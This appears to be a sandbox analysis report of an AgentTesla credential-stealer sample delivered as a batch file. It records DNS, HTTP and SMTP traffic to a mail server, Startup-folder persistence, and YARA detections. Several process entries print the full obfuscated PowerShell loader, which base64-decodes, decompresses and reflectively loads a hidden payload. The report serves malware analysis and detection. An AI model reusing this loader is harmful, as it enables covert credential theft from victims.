                                                                                                            Oct 30, 2024 17:41:44.112973928 CET58749815163.44.198.71192.168.2.7
                                                                                                            Oct 30, 2024 17:41:44.471879005 CET58749815163.44.198.71192.168.2.7
                                                                                                            Oct 30, 2024 17:41:44.519999981 CET49815587192.168.2.7163.44.198.71
                                                                                                            Oct 30, 2024 17:42:09.060452938 CET8049802208.95.112.1192.168.2.7
                                                                                                            Oct 30, 2024 17:42:09.060559034 CET4980280192.168.2.7208.95.112.1
                                                                                                            Oct 30, 2024 17:42:29.333148003 CET4980280192.168.2.7208.95.112.1
                                                                                                            Oct 30, 2024 17:42:29.338766098 CET8049802208.95.112.1192.168.2.7
                                                                                                            Oct 30, 2024 17:43:19.348673105 CET49815587192.168.2.7163.44.198.71
                                                                                                            Oct 30, 2024 17:43:19.354127884 CET58749815163.44.198.71192.168.2.7
                                                                                                            Oct 30, 2024 17:43:19.718096972 CET58749815163.44.198.71192.168.2.7
                                                                                                            Oct 30, 2024 17:43:19.722146988 CET49815587192.168.2.7163.44.198.71

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 30, 2024 17:41:23.460956097 CET6396153192.168.2.71.1.1.1
                                                                                                            Oct 30, 2024 17:41:23.468488932 CET53639611.1.1.1192.168.2.7
                                                                                                            Oct 30, 2024 17:41:24.756714106 CET4960653192.168.2.71.1.1.1
                                                                                                            Oct 30, 2024 17:41:25.770641088 CET4960653192.168.2.71.1.1.1
                                                                                                            Oct 30, 2024 17:41:26.767882109 CET53496061.1.1.1192.168.2.7
                                                                                                            Oct 30, 2024 17:41:26.767901897 CET53496061.1.1.1192.168.2.7
                                                                                                            Oct 30, 2024 17:41:37.529337883 CET5080253192.168.2.71.1.1.1
                                                                                                            Oct 30, 2024 17:41:37.536606073 CET53508021.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 30, 2024 17:41:23.460956097 CET192.168.2.71.1.1.10x8d3dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:24.756714106 CET192.168.2.71.1.1.10x551dStandard query (0)nffplp.comA (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:25.770641088 CET192.168.2.71.1.1.10x551dStandard query (0)nffplp.comA (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:37.529337883 CET192.168.2.71.1.1.10xc0bbStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 30, 2024 17:41:18.505199909 CET1.1.1.1192.168.2.70xb49cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:18.505199909 CET1.1.1.1192.168.2.70xb49cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:23.468488932 CET1.1.1.1192.168.2.70x8d3dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:26.767882109 CET1.1.1.1192.168.2.70x551dNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:26.767901897 CET1.1.1.1192.168.2.70x551dNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false
                                                                                                            Oct 30, 2024 17:41:37.536606073 CET1.1.1.1192.168.2.70xc0bbNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • ip-api.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749724208.95.112.1807176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 30, 2024 17:41:23.491271019 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                            Host: ip-api.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Oct 30, 2024 17:41:24.085309029 CET174INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 30 Oct 2024 16:41:23 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Content-Length: 5
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            X-Ttl: 60
                                                                                                            X-Rl: 44
                                                                                                            Data Raw: 74 72 75 65 0a
                                                                                                            Data Ascii: true


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749802208.95.112.1807684C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 30, 2024 17:41:38.012331009 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                            Host: ip-api.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Oct 30, 2024 17:41:38.595783949 CET174INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 30 Oct 2024 16:41:37 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Content-Length: 5
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            X-Ttl: 45
                                                                                                            X-Rl: 43
                                                                                                            Data Raw: 74 72 75 65 0a
                                                                                                            Data Ascii: true


                                                                                                            SMTP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                            Oct 30, 2024 17:41:27.850826979 CET58749740163.44.198.71192.168.2.7220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Wed, 30 Oct 2024 23:41:27 +0700
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Oct 30, 2024 17:41:27.851134062 CET49740587192.168.2.7163.44.198.71EHLO 494126
                                                                                                            Oct 30, 2024 17:41:28.204102039 CET58749740163.44.198.71192.168.2.7250-cpanel16wh.bkk1.cloud.z.com Hello 494126 [173.254.250.78]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Oct 30, 2024 17:41:28.204581022 CET49740587192.168.2.7163.44.198.71STARTTLS
                                                                                                            Oct 30, 2024 17:41:28.560406923 CET58749740163.44.198.71192.168.2.7220 TLS go ahead
                                                                                                            Oct 30, 2024 17:41:40.411194086 CET58749815163.44.198.71192.168.2.7220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Wed, 30 Oct 2024 23:41:40 +0700
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Oct 30, 2024 17:41:40.411468029 CET49815587192.168.2.7163.44.198.71EHLO 494126
                                                                                                            Oct 30, 2024 17:41:40.769721031 CET58749815163.44.198.71192.168.2.7250-cpanel16wh.bkk1.cloud.z.com Hello 494126 [173.254.250.78]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Oct 30, 2024 17:41:40.769902945 CET49815587192.168.2.7163.44.198.71STARTTLS
                                                                                                            Oct 30, 2024 17:41:41.129446030 CET58749815163.44.198.71192.168.2.7220 TLS go ahead

                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
                                                                                                            Imagebase:0x7ff72ae00000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:chcp 65001
                                                                                                            Imagebase:0x7ff748c80000
                                                                                                            File size:14'848 bytes
                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                                                            Imagebase:0x7ff72ae00000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\xcopy.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
                                                                                                            Imagebase:0x7ff647c30000
                                                                                                            File size:50'688 bytes
                                                                                                            MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:23'040 bytes
                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:12:41:19
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                                                                                                            Imagebase:0xa30000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1406003010.0000000008AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:12:41:21
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:42'064 bytes
                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:12:41:32
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
                                                                                                            Imagebase:0x7ff7964f0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:12:41:33
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
                                                                                                            Imagebase:0x7ff72ae00000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:12:41:33
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:12:41:33
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:chcp 65001
                                                                                                            Imagebase:0x7ff748c80000
                                                                                                            File size:14'848 bytes
                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:12:41:33
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                                                            Imagebase:0x7ff72ae00000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:14
                                                                                                            Start time:12:41:34
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\xcopy.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
                                                                                                            Imagebase:0x7ff647c30000
                                                                                                            File size:50'688 bytes
                                                                                                            MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:15
                                                                                                            Start time:12:41:34
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
                                                                                                            Imagebase:0x7ff6cff50000
                                                                                                            File size:23'040 bytes
                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:16
                                                                                                            Start time:12:41:34
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                                                                                                            Imagebase:0xca0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:18
                                                                                                            Start time:12:41:36
                                                                                                            Start date:30/10/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                            Imagebase:0x650000
                                                                                                            File size:42'064 bytes
                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.7%
                                                                                                              Dynamic/Decrypted Code Coverage:98.9%
                                                                                                              Signature Coverage:13.1%
                                                                                                              Total number of Nodes:282
                                                                                                              Total number of Limit Nodes:14
                                                                                                              execution_graph 64555 8c79ad6 64559 8c7d250 64555->64559 64557 8c79afe 64561 8c7d277 64559->64561 64563 8c7d750 64561->64563 64564 8c7d799 VirtualProtect 64563->64564 64566 8c718c6 64564->64566 64566->64555 64566->64557 64567 8aa55b8 64568 8aa5607 NtProtectVirtualMemory 64567->64568 64570 8aa567f 64568->64570 64625 8c74874 64628 8c7e7c0 64625->64628 64629 8c7e7d5 64628->64629 64632 8c7e810 64629->64632 64633 8c7e837 64632->64633 64636 8c7e918 64633->64636 64637 8c7e95c VirtualAlloc 64636->64637 64639 8c74898 64637->64639 64571 408d01c 64572 408d034 64571->64572 64573 408d08f 64572->64573 64575 8c7de38 64572->64575 64576 8c7de91 64575->64576 64579 8c7e3c8 64576->64579 64577 8c7dec6 64580 8c7e3f5 64579->64580 64581 8c7d250 VirtualProtect 64580->64581 64583 8c7e58b 64580->64583 64582 8c7e57c 64581->64582 64582->64577 64583->64577 64515 8b77d32 64516 8b77d3c 64515->64516 64520 8a9c6a8 64516->64520 64526 8a9c698 64516->64526 64517 8b77d7a 64521 8a9c6bd 64520->64521 64532 8a9c839 64521->64532 64537 8a9c6da 64521->64537 64542 8a9c6e8 64521->64542 64522 8a9c6d3 64522->64517 64527 8a9c6bd 64526->64527 64529 8a9c839 2 API calls 64527->64529 64530 8a9c6e8 2 API calls 64527->64530 64531 8a9c6da 2 API calls 64527->64531 64528 8a9c6d3 64528->64517 64529->64528 64530->64528 64531->64528 64534 8a9c75f 64532->64534 64533 8a9cc7a 64533->64522 64534->64533 64547 8aa7118 64534->64547 64551 8aa7111 64534->64551 64539 8a9c712 64537->64539 64538 8a9cc7a 64538->64522 64539->64538 64540 8aa7118 VirtualProtect 64539->64540 64541 8aa7111 VirtualProtect 64539->64541 64540->64539 64541->64539 64544 8a9c712 64542->64544 64543 8a9cc7a 64543->64522 64544->64543 64545 8aa7118 VirtualProtect 64544->64545 64546 8aa7111 VirtualProtect 64544->64546 64545->64544 64546->64544 64548 8aa7161 VirtualProtect 64547->64548 64550 8aa71ce 64548->64550 64550->64534 64552 8aa7161 VirtualProtect 64551->64552 64554 8aa71ce 64552->64554 64554->64534 64885 8c72921 64887 8c7d250 VirtualProtect 64885->64887 64886 8c72939 64887->64886 64588 8b77c1e 64589 8b77c34 64588->64589 64593 8aacf10 64589->64593 64597 8aacf00 64589->64597 64590 8b77c78 64594 8aacf25 64593->64594 64595 8aacf3b 64594->64595 64601 8aaf29a 64594->64601 64595->64590 64598 8aacf25 64597->64598 64599 8aaf29a 2 API calls 64598->64599 64600 8aacf3b 64598->64600 64599->64600 64600->64590 64602 8aaf2de 64601->64602 64603 8aadbd2 64601->64603 64607 8a82280 64602->64607 64612 8a82290 64602->64612 64603->64595 64608 8a82290 64607->64608 64617 8aa89a0 64608->64617 64621 8aa8994 64608->64621 64613 8a822a5 64612->64613 64615 8aa89a0 CopyFileA 64613->64615 64616 8aa8994 CopyFileA 64613->64616 64614 8a822c3 64615->64614 64616->64614 64618 8aa89fc CopyFileA 64617->64618 64620 8aa8b2d 64618->64620 64622 8aa89fc CopyFileA 64621->64622 64624 8aa8b2d 64622->64624 64584 8c73dda 64585 8c73df9 64584->64585 64587 8c7d250 VirtualProtect 64585->64587 64586 8c73e20 64587->64586 64640 8b77d88 64641 8b77d92 64640->64641 64645 8a82bc8 64641->64645 64650 8a82bd8 64641->64650 64642 8b77277 64646 8a82bed 64645->64646 64647 8a82c03 64646->64647 64655 8a82f6a 64646->64655 64660 8a82d65 64646->64660 64647->64642 64651 8a82bed 64650->64651 64652 8a82c03 64651->64652 64653 